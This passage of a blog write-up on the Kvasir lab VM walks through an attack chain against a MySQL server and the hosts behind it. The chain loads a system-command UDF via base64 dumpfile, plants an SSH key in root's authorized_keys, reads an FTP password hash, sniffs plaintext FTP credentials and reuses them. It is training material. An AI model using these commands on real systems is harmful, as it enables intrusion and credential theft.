<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
<span class='line-number'>69</span>
<span class='line-number'>70</span>
<span class='line-number'>71</span>
<span class='line-number'>72</span>
<span class='line-number'>73</span>
<span class='line-number'>74</span>
<span class='line-number'>75</span>
<span class='line-number'>76</span>
<span class='line-number'>77</span>
<span class='line-number'>78</span>
<span class='line-number'>79</span>
<span class='line-number'>80</span>
<span class='line-number'>81</span>
<span class='line-number'>82</span>
<span class='line-number'>83</span>
<span class='line-number'>84</span>
<span class='line-number'>85</span>
<span class='line-number'>86</span>
<span class='line-number'>87</span>
<span class='line-number'>88</span>
<span class='line-number'>89</span>
<span class='line-number'>90</span>
<span class='line-number'>91</span>
<span class='line-number'>92</span>
<span class='line-number'>93</span>
<span class='line-number'>94</span>
<span class='line-number'>95</span>
<span class='line-number'>96</span>
<span class='line-number'>97</span>
<span class='line-number'>98</span>
<span class='line-number'>99</span>
<span class='line-number'>100</span>
<span class='line-number'>101</span>
<span class='line-number'>102</span>
<span class='line-number'>103</span>
<span class='line-number'>104</span>
<span class='line-number'>105</span>
<span class='line-number'>106</span>
<span class='line-number'>107</span>
<span class='line-number'>108</span>
<span class='line-number'>109</span>
<span class='line-number'>110</span>
<span class='line-number'>111</span>
<span class='line-number'>112</span>
<span class='line-number'>113</span>
<span class='line-number'>114</span>
<span class='line-number'>115</span>
<span class='line-number'>116</span>
<span class='line-number'>117</span>
<span class='line-number'>118</span>
<span class='line-number'>119</span>
<span class='line-number'>120</span>
<span class='line-number'>121</span>
<span class='line-number'>122</span>
<span class='line-number'>123</span>
<span class='line-number'>124</span>
<span class='line-number'>125</span>
<span class='line-number'>126</span>
<span class='line-number'>127</span>
<span class='line-number'>128</span>
<span class='line-number'>129</span>
<span class='line-number'>130</span>
<span class='line-number'>131</span>
<span class='line-number'>132</span>
<span class='line-number'>133</span>
<span class='line-number'>134</span>
<span class='line-number'>135</span>
<span class='line-number'>136</span>
<span class='line-number'>137</span>
<span class='line-number'>138</span>
<span class='line-number'>139</span>
<span class='line-number'>140</span>
<span class='line-number'>141</span>
<span class='line-number'>142</span>
<span class='line-number'>143</span>
<span class='line-number'>144</span>
<span class='line-number'>145</span>
<span class='line-number'>146</span>
<span class='line-number'>147</span>
<span class='line-number'>148</span>
<span class='line-number'>149</span>
<span class='line-number'>150</span>
<span class='line-number'>151</span>
<span class='line-number'>152</span>
<span class='line-number'>153</span>
<span class='line-number'>154</span>
<span class='line-number'>155</span>
<span class='line-number'>156</span>
<span class='line-number'>157</span>
<span class='line-number'>158</span>
<span class='line-number'>159</span>
<span class='line-number'>160</span>
<span class='line-number'>161</span>
<span class='line-number'>162</span>
<span class='line-number'>163</span>
<span class='line-number'>164</span>
<span class='line-number'>165</span>
<span class='line-number'>166</span>
<span class='line-number'>167</span>
<span class='line-number'>168</span>
<span class='line-number'>169</span>
<span class='line-number'>170</span>
<span class='line-number'>171</span>
<span class='line-number'>172</span>
<span class='line-number'>173</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>-- base64.sql - MySQL base64 encoding/decoding functions
</span><span class='line'>-- Copyright (C) 2006 Ian Gulliver
</span><span class='line'>-- 
</span><span class='line'>-- This program is free software; you can redistribute it and/or modify
</span><span class='line'>-- it under the terms of version 2 of the GNU General Public License as
</span><span class='line'>-- published by the Free Software Foundation.
</span><span class='line'>-- 
</span><span class='line'>-- This program is distributed in the hope that it will be useful,
</span><span class='line'>-- but WITHOUT ANY WARRANTY; without even the implied warranty of
</span><span class='line'>-- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
</span><span class='line'>-- GNU General Public License for more details.
</span><span class='line'>-- 
</span><span class='line'>-- You should have received a copy of the GNU General Public License
</span><span class='line'>-- along with this program; if not, write to the Free Software
</span><span class='line'>-- Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
</span><span class='line'>
</span><span class='line'>delimiter |
</span><span class='line'>
</span><span class='line'>DROP TABLE IF EXISTS base64_data |
</span><span class='line'>CREATE TABLE base64_data (c CHAR(1) BINARY, val TINYINT) |
</span><span class='line'>INSERT INTO base64_data VALUES 
</span><span class='line'>('A',0), ('B',1), ('C',2), ('D',3), ('E',4), ('F',5), ('G',6), ('H',7), ('I',8), ('J',9),
</span><span class='line'>('K',10), ('L',11), ('M',12), ('N',13), ('O',14), ('P',15), ('Q',16), ('R',17), ('S',18), ('T',19),
</span><span class='line'>('U',20), ('V',21), ('W',22), ('X',23), ('Y',24), ('Z',25), ('a',26), ('b',27), ('c',28), ('d',29),
</span><span class='line'>('e',30), ('f',31), ('g',32), ('h',33), ('i',34), ('j',35), ('k',36), ('l',37), ('m',38), ('n',39),
</span><span class='line'>('o',40), ('p',41), ('q',42), ('r',43), ('s',44), ('t',45), ('u',46), ('v',47), ('w',48), ('x',49),
</span><span class='line'>('y',50), ('z',51), ('0',52), ('1',53), ('2',54), ('3',55), ('4',56), ('5',57), ('6',58), ('7',59),
</span><span class='line'>('8',60), ('9',61), ('+',62), ('/',63), ('=',0) |
</span><span class='line'>
</span><span class='line'>
</span><span class='line'>DROP FUNCTION IF EXISTS BASE64_DECODE |
</span><span class='line'>CREATE FUNCTION BASE64_DECODE (input BLOB)
</span><span class='line'>RETURNS BLOB
</span><span class='line'>CONTAINS SQL
</span><span class='line'>DETERMINISTIC
</span><span class='line'>SQL SECURITY INVOKER
</span><span class='line'>BEGIN
</span><span class='line'>DECLARE ret BLOB DEFAULT '';
</span><span class='line'>DECLARE done TINYINT DEFAULT 0;
</span><span class='line'>
</span><span class='line'>IF input IS NULL THEN
</span><span class='line'>RETURN NULL;
</span><span class='line'>END IF;
</span><span class='line'>
</span><span class='line'>each_block:
</span><span class='line'>WHILE NOT done DO BEGIN
</span><span class='line'>DECLARE accum_value BIGINT UNSIGNED DEFAULT 0;
</span><span class='line'>DECLARE in_count TINYINT DEFAULT 0;
</span><span class='line'>DECLARE out_count TINYINT DEFAULT 3;
</span><span class='line'>
</span><span class='line'>each_input_char:
</span><span class='line'>WHILE in_count &lt; 4 DO BEGIN
</span><span class='line'>DECLARE first_char CHAR(1);
</span><span class='line'>
</span><span class='line'>IF LENGTH(input) = 0 THEN
</span><span class='line'>RETURN ret;
</span><span class='line'>END IF;
</span><span class='line'>
</span><span class='line'>SET first_char = SUBSTRING(input,1,1);
</span><span class='line'>SET input = SUBSTRING(input,2);
</span><span class='line'>
</span><span class='line'>BEGIN
</span><span class='line'>DECLARE tempval TINYINT UNSIGNED;
</span><span class='line'>DECLARE error TINYINT DEFAULT 0;
</span><span class='line'>DECLARE base64_getval CURSOR FOR SELECT val FROM base64_data WHERE c = first_char;
</span><span class='line'>DECLARE CONTINUE HANDLER FOR SQLSTATE '02000' SET error = 1;
</span><span class='line'>
</span><span class='line'>OPEN base64_getval;
</span><span class='line'>FETCH base64_getval INTO tempval;
</span><span class='line'>CLOSE base64_getval;
</span><span class='line'>
</span><span class='line'>IF error THEN
</span><span class='line'>ITERATE each_input_char;
</span><span class='line'>END IF;
</span><span class='line'>
</span><span class='line'>SET accum_value = (accum_value &lt;&lt; 6) + tempval;
</span><span class='line'>END;
</span><span class='line'>
</span><span class='line'>SET in_count = in_count + 1;
</span><span class='line'>
</span><span class='line'>IF first_char = '=' THEN
</span><span class='line'>SET done = 1;
</span><span class='line'>SET out_count = out_count - 1;
</span><span class='line'>END IF;
</span><span class='line'>END; END WHILE;
</span><span class='line'>
</span><span class='line'>-- We've now accumulated 24 bits; deaccumulate into bytes
</span><span class='line'>
</span><span class='line'>-- We have to work from the left, so use the third byte position and shift left
</span><span class='line'>WHILE out_count &gt; 0 DO BEGIN
</span><span class='line'>SET ret = CONCAT(ret,CHAR((accum_value & 0xff0000) &gt;&gt; 16));
</span><span class='line'>SET out_count = out_count - 1;
</span><span class='line'>SET accum_value = (accum_value &lt;&lt; 8) & 0xffffff;
</span><span class='line'>END; END WHILE;
</span><span class='line'>
</span><span class='line'>END; END WHILE;
</span><span class='line'>
</span><span class='line'>RETURN ret;
</span><span class='line'>END |
</span><span class='line'>
</span><span class='line'>DROP FUNCTION IF EXISTS BASE64_ENCODE |
</span><span class='line'>CREATE FUNCTION BASE64_ENCODE (input BLOB)
</span><span class='line'>RETURNS BLOB
</span><span class='line'>CONTAINS SQL
</span><span class='line'>DETERMINISTIC
</span><span class='line'>SQL SECURITY INVOKER
</span><span class='line'>BEGIN
</span><span class='line'>DECLARE ret BLOB DEFAULT '';
</span><span class='line'>DECLARE done TINYINT DEFAULT 0;
</span><span class='line'>
</span><span class='line'>IF input IS NULL THEN
</span><span class='line'>RETURN NULL;
</span><span class='line'>END IF;
</span><span class='line'>
</span><span class='line'>each_block:
</span><span class='line'>WHILE NOT done DO BEGIN
</span><span class='line'>DECLARE accum_value BIGINT UNSIGNED DEFAULT 0;
</span><span class='line'>DECLARE in_count TINYINT DEFAULT 0;
</span><span class='line'>DECLARE out_count TINYINT;
</span><span class='line'>
</span><span class='line'>each_input_char:
</span><span class='line'>WHILE in_count &lt; 3 DO BEGIN
</span><span class='line'>DECLARE first_char CHAR(1);
</span><span class='line'>
</span><span class='line'>IF LENGTH(input) = 0 THEN
</span><span class='line'>SET done = 1;
</span><span class='line'>SET accum_value = accum_value &lt;&lt; (8 * (3 - in_count));
</span><span class='line'>LEAVE each_input_char;
</span><span class='line'>END IF;
</span><span class='line'>
</span><span class='line'>SET first_char = SUBSTRING(input,1,1);
</span><span class='line'>SET input = SUBSTRING(input,2);
</span><span class='line'>
</span><span class='line'>SET accum_value = (accum_value &lt;&lt; 8) + ASCII(first_char);
</span><span class='line'>
</span><span class='line'>SET in_count = in_count + 1;
</span><span class='line'>END; END WHILE;
</span><span class='line'>
</span><span class='line'>-- We've now accumulated 24 bits; deaccumulate into base64 characters
</span><span class='line'>
</span><span class='line'>-- We have to work from the left, so use the third byte position and shift left
</span><span class='line'>CASE
</span><span class='line'>WHEN in_count = 3 THEN SET out_count = 4;
</span><span class='line'>WHEN in_count = 2 THEN SET out_count = 3;
</span><span class='line'>WHEN in_count = 1 THEN SET out_count = 2;
</span><span class='line'>ELSE RETURN ret;
</span><span class='line'>END CASE;
</span><span class='line'>
</span><span class='line'>WHILE out_count &gt; 0 DO BEGIN
</span><span class='line'>BEGIN
</span><span class='line'>DECLARE out_char CHAR(1);
</span><span class='line'>DECLARE base64_getval CURSOR FOR SELECT c FROM base64_data WHERE val = (accum_value &gt;&gt; 18);
</span><span class='line'>
</span><span class='line'>OPEN base64_getval;
</span><span class='line'>FETCH base64_getval INTO out_char;
</span><span class='line'>CLOSE base64_getval;
</span><span class='line'>
</span><span class='line'>SET ret = CONCAT(ret,out_char);
</span><span class='line'>SET out_count = out_count - 1;
</span><span class='line'>SET accum_value = accum_value &lt;&lt; 6 & 0xffffff;
</span><span class='line'>END;
</span><span class='line'>END; END WHILE;
</span><span class='line'>
</span><span class='line'>CASE
</span><span class='line'>WHEN in_count = 2 THEN SET ret = CONCAT(ret,'=');
</span><span class='line'>WHEN in_count = 1 THEN SET ret = CONCAT(ret,'==');
</span><span class='line'>ELSE BEGIN END;
</span><span class='line'>END CASE;
</span><span class='line'>
</span><span class='line'>END; END WHILE;
</span><span class='line'>
</span><span class='line'>RETURN ret;
</span><span class='line'>END |</span></code></pre></td></tr></table></div></figure>


<ul>
<li><p>Download 64 bit version of the <a href="https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql/linux">UDF library</a> and run <code>base64</code> through it (32 bit version returns: &lsquo;wrong ELF class: ELFCLASS32&rsquo;).</p></li>
<li><p>Insert base64 value into the table</p></li>
</ul>


<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>mysql&gt; insert into pwn(test) values ("f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAwAgAADQAAACoJAAAA (...)");</span></code></pre></td></tr></table></div></figure>


<ul>
<li>generate binary</li>
</ul>


<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>mysql&gt; select base64_decode(test) from pentest into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';</span></code></pre></td></tr></table></div></figure>


<ul>
<li>add the following functions</li>
</ul>


<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
</span><span class='line'>DROP FUNCTION IF EXISTS sys_get;
</span><span class='line'>DROP FUNCTION IF EXISTS sys_set;
</span><span class='line'>DROP FUNCTION IF EXISTS sys_exec;
</span><span class='line'>DROP FUNCTION IF EXISTS sys_eval;
</span><span class='line'>
</span><span class='line'>CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
</span><span class='line'>CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
</span><span class='line'>CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
</span><span class='line'>CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
</span><span class='line'>CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';</span></code></pre></td></tr></table></div></figure>


<p><em>We really only need sys_eval</em></p>

<ul>
<li>generate keys on Kali and add public key to <code>/root/.ssh/authorized_keys</code> on the database server:</li>
</ul>


<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>mysql&gt; select sys_eval('echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqtaI+mJb7hYALi8qoSXi8wntkC4QuNyFNWLfDzNC1GxeU+pZHz9BCTqFKwzqYLC3Z4CcD3y8I7KsCrBEgFVJaW9OWCoZHeiSnoDOorv/9C8uk7CRZ1jM9AVE7fsuL6rOUHuEFbSgCDLnbo5SFntQSX7UqHDOnn6glhVf+zn58tYf8wMSdH+Is/oAVrJ0G7h7fKNvbIDkVysiBZeZQrMZ3KG5CVq/FzgnSg+WD14YsRVtlcI1irfAdR3MCl4SgGXohAOEvX6mrcMcbe8lvxGRzcJ/T6fe/dHmZUdhZll3ABSHRLYERFqXOtH7veGeZD/PyLXEDzvW0iJUPape2EYrB root@kali" &gt; /root/.ssh/authorized_keys');</span></code></pre></td></tr></table></div></figure>


<ul>
<li>set right permissions</li>
</ul>


<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>mysql&gt; select sys_eval('chmod 600 /root/.ssh/authorized_keys');</span></code></pre></td></tr></table></div></figure>


<p>And now we should be able to SSH in as root.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# proxychains ssh root@192.168.2.200
</span><span class='line'>ProxyChains-3.1 (http://proxychains.sf.net)
</span><span class='line'>|S-chain|-&lt;&gt;-127.0.0.1:1080-&lt;&gt;&lt;&gt;-192.168.2.200:22-&lt;&gt;&lt;&gt;-OK
</span><span class='line'>Linux db 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64
</span><span class='line'>
</span><span class='line'>The programs included with the Debian GNU/Linux system are free software;
</span><span class='line'>the exact distribution terms for each program are described in the
</span><span class='line'>individual files in /usr/share/doc/*/copyright.
</span><span class='line'>
</span><span class='line'>Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
</span><span class='line'>permitted by applicable law.
</span><span class='line'>Last login: Tue Nov  4 20:26:44 2014 from 192.168.2.100
</span><span class='line'>root@db:~#</span></code></pre></td></tr></table></div></figure>


<p>Woooooo! That&rsquo;s not the final root though&hellip;</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# cat flag 
</span><span class='line'>This is not the flag you're looking for... :p</span></code></pre></td></tr></table></div></figure>


<h2>FTP? Sniff! Sniff!</h2>

<p>After a bit of poking around, we can get some potentially useful information - some dictionary&hellip;</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# head .words.txt 
</span><span class='line'>borne
</span><span class='line'>precombatting
</span><span class='line'>noncandescent
</span><span class='line'>cushat
</span><span class='line'>lushness
</span><span class='line'>
</span><span class='line'>(...truncated...)</span></code></pre></td></tr></table></div></figure>


<p>Hostnames and IP addresses&hellip;</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# cat /etc/hosts
</span><span class='line'># 192.168.3.40  celes
</span><span class='line'># 192.168.3.50  terra
</span><span class='line'>
</span><span class='line'>127.0.0.1   localhost
</span><span class='line'>::1     localhost ip6-localhost ip6-loopback
</span><span class='line'>fe00::0     ip6-localnet
</span><span class='line'>ff00::0     ip6-mcastprefix
</span><span class='line'>ff02::1     ip6-allnodes
</span><span class='line'>ff02::2     ip6-allrouters</span></code></pre></td></tr></table></div></figure>


<p>Find out that it&rsquo;s dual homed&hellip; again!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# ifconfig
</span><span class='line'>eth0      Link encap:Ethernet  HWaddr fe:57:f7:0e:e1:98  
</span><span class='line'>          inet addr:192.168.2.200  Bcast:192.168.2.255  Mask:255.255.255.0
</span><span class='line'>          inet6 addr: fe80::fc57:f7ff:fe0e:e198/64 Scope:Link
</span><span class='line'>          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
</span><span class='line'>          RX packets:69773 errors:0 dropped:0 overruns:0 frame:0
</span><span class='line'>          TX packets:55386 errors:0 dropped:0 overruns:0 carrier:0
</span><span class='line'>          collisions:0 txqueuelen:1000 
</span><span class='line'>          RX bytes:5835676 (5.5 MiB)  TX bytes:9220761 (8.7 MiB)
</span><span class='line'>
</span><span class='line'>eth1      Link encap:Ethernet  HWaddr 86:b5:59:44:80:fb  
</span><span class='line'>          inet addr:192.168.3.200  Bcast:192.168.3.255  Mask:255.255.255.0
</span><span class='line'>          inet6 addr: fe80::84b5:59ff:fe44:80fb/64 Scope:Link
</span><span class='line'>          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
</span><span class='line'>          RX packets:106899 errors:0 dropped:0 overruns:0 frame:0
</span><span class='line'>          TX packets:91488 errors:0 dropped:0 overruns:0 carrier:0
</span><span class='line'>          collisions:0 txqueuelen:1000 
</span><span class='line'>          RX bytes:15188636 (14.4 MiB)  TX bytes:8176191 (7.7 MiB)
</span><span class='line'>
</span><span class='line'>(...)</span></code></pre></td></tr></table></div></figure>


<p>And we can also see that there&rsquo;s FTP service enabled.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# netstat -ant
</span><span class='line'>Active Internet connections (servers and established)
</span><span class='line'>Proto Recv-Q Send-Q Local Address           Foreign Address         State      
</span><span class='line'>tcp        0      0 192.168.2.200:3306      0.0.0.0:*               LISTEN     
</span><span class='line'>tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN     
</span><span class='line'>tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
</span><span class='line'>tcp        0      0 192.168.2.200:22        192.168.2.100:43133     ESTABLISHED
</span><span class='line'>tcp        0      0 192.168.3.200:21214     192.168.3.40:45888      TIME_WAIT  
</span><span class='line'>tcp        0      0 192.168.3.200:58695     192.168.3.50:22         ESTABLISHED
</span><span class='line'>tcp        0    320 192.168.2.200:22        192.168.2.100:43595     ESTABLISHED
</span><span class='line'>tcp6       0      0 :::21                   :::*                    LISTEN     
</span><span class='line'>tcp6       0      0 :::22                   :::*                    LISTEN     
</span><span class='line'>
</span><span class='line'>(...some more poking around...)
</span><span class='line'>
</span><span class='line'>root@db:~# cat /etc/pure-ftpd/pureftpd.passwd 
</span><span class='line'>celes:$1$LwZNkFH0$8rq4AbiYLXkfSMPXB1psV/:1000:1000::/var/log/./::::::::::::</span></code></pre></td></tr></table></div></figure>


<p>Unfortunately I didn&rsquo;t seem to be able to crack this password using a dictionary. That got me stuck a bit.
Sometimes you need to take a step back and ask yourself a question &ldquo;what&rsquo;s insecure about&hellip; FTP?&rdquo;. Of course! It&rsquo;s plaintext!</p>

<p>Let&rsquo;s assume (and hope) there are &lsquo;users&rsquo; on the system, so let&rsquo;s try to sniff some traffic!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# tcpdump -i eth1 -vv -x 'port 21' -w ftp-sniff.pcap
</span><span class='line'>tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes
</span><span class='line'>^C21 packets captured
</span><span class='line'>21 packets received by filter
</span><span class='line'>0 packets dropped by kernel</span></code></pre></td></tr></table></div></figure>


<p>Woohoo, there are some packets! Further investigation into them reveals the following username:password combination <code>celes:im22BF4HXn01</code>.</p>

<h2>Stego</h2>

<p>Let&rsquo;s hope celes is a user of very average security awarness and reuses his passwords everywhere&hellip; let&rsquo;s try to SSH using these credentials.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# ssh celes@192.168.3.40
</span><span class='line'>celes@192.168.3.40's password: 
</span><span class='line'>Linux dev1 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64
</span><span class='line'>
</span><span class='line'>The programs included with the Debian GNU/Linux system are free software;
</span><span class='line'>the exact distribution terms for each program are described in the
</span><span class='line'>individual files in /usr/share/doc/*/copyright.
</span><span class='line'>
</span><span class='line'>Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
</span><span class='line'>permitted by applicable law.
</span><span class='line'>You have mail.
</span><span class='line'>Last login: Fri Oct 24 10:35:02 2014 from 192.168.3.200
</span><span class='line'>celes@dev1:~$ </span></code></pre></td></tr></table></div></figure>


<p>And we&rsquo;re in. A bit of poking around and can&rsquo;t see anything really interesting except an image file <code>kvasir.png</code>. Let&rsquo;s download it (<code>scp</code> all the way back) and see what can we get out of it.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/kvasir.png" title="Kvasir" alt="Kvasir" /></p>

<p>Also <code>strings</code> didn&rsquo;t reveal anything interesting about the file. But looking at <code>.bash_history</code> on celes, we can see a clue.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>celes@dev1:~$ cat .bash_history 
</span><span class='line'>stepic --help</span></code></pre></td></tr></table></div></figure>


<p>Aha, must be some kind of stego! I have quickly downloaded <code>stepic</code> and run on <code>kvasir.png</code>.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/data/scripts/stepic-0.3# ./stepic -d -i ~/data/boot2root/kvasir/kvasir.png 
</span><span class='line'>89504e470d0a1a0a0000000d494844520000012200000122010300000067704df500000006504c5445ffffff00000055c2d37e00000104494441540899ed98c90dc32010459152804b72eb2ec9054422304bc089655f180ec9fb0730f07cfa9a0552420821f43fcaa6674aeb5e96dbe23b1b5434a58be559bf1e59befa03a848aa5ab22de690f2d530a8895473086a365500e7a1265132b5b3bbfc05358e7a57640b919bba0d358eeab55c9c418da7cc0df1a576a2792fa561ad035434a5920b808588d974e215d4584acff4065626ffe9db47a8e194eec805a00d7621830aa6acffd40c95d5a6fa27d404cae555e13475410550e6cca113ed72145424a56ee8ab4f8989ecb5196a02d5bdfa2477e83333410553d97ba093cc04154c89a439ba880ea881944c2d3aea0a6a0e75acc8528c4550e1144208a15fd70b88df9bb4ae0a3dc20000000049454e44ae426082</span></code></pre></td></tr></table></div></figure>


<p>Hmm, alright&hellip; that looks like some hex output&hellip; let&rsquo;s run it through <code>xxd</code></p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
